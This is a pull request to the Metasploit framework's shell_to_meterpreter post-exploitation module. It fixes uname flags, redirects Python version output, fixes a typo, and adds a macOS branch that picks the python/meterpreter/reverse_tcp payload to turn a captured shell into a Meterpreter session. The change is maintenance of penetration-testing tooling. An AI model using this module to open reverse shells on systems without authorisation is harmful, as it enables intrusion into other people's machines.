### PR TITLE
Issue #6359 fix - post/multi/manage/shell_to_meterpreter.rb

### DIFF
--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -101,7 +101,11 @@ class Metasploit3 < Msf::Post
         lplat = [Msf::Platform::Linux]
         larch = [ARCH_X86]
         vprint_status("Platform: Linux")
-      elsif cmd_exec('python -V') =~ /Python (2|3)\.(\d)/
+      elsif target_info =~ /darwin/i
+        platform = 'python'
+        payload_name = 'python/meterpreter/reverse_tcp'
+        vprint_status("Platform: OS X")
+      elsif cmd_exec('python -V 2>&1') =~ /Python (2|3)\.(\d)/
         # Generic fallback for OSX, Solaris, Linux/ARM
         platform = 'python'
         payload_name = 'python/meterpreter/reverse_tcp'

--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -112,7 +112,7 @@ class Metasploit3 < Msf::Post
     vprint_status("Upgrade payload: #{payload_name}")
 
     if platform.blank?
-      print_error("Shells on the the target platform, #{session.platform}, cannot be upgraded to Meterpreter at this time.")
+      print_error("Shells on the target platform, #{session.platform}, cannot be upgraded to Meterpreter at this time.")
       return nil
     end
 

--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -93,7 +93,7 @@ class Metasploit3 < Msf::Post
       vprint_status("Platform: Solaris")
     else
       # Find the best fit, be specific with uname to avoid matching hostname or something else
-      target_info = cmd_exec('uname -mo')
+      target_info = cmd_exec('uname -ms')
       if target_info =~ /linux/i && target_info =~ /86/
         # Handle linux shells that were identified as 'unix'
         platform = 'linux'


### PR DESCRIPTION
Fix #6359 

@timwr's typo, `uname` fix

Also redirected `python -V` stderr to stdout, as on OSX it goes to stderr and we don't get the result, added a darwin -> python upgrade.

OSX does get caught by the fallback with just the `2>&1` fix, but matching on darwin will let us change the payload at a later date easier.
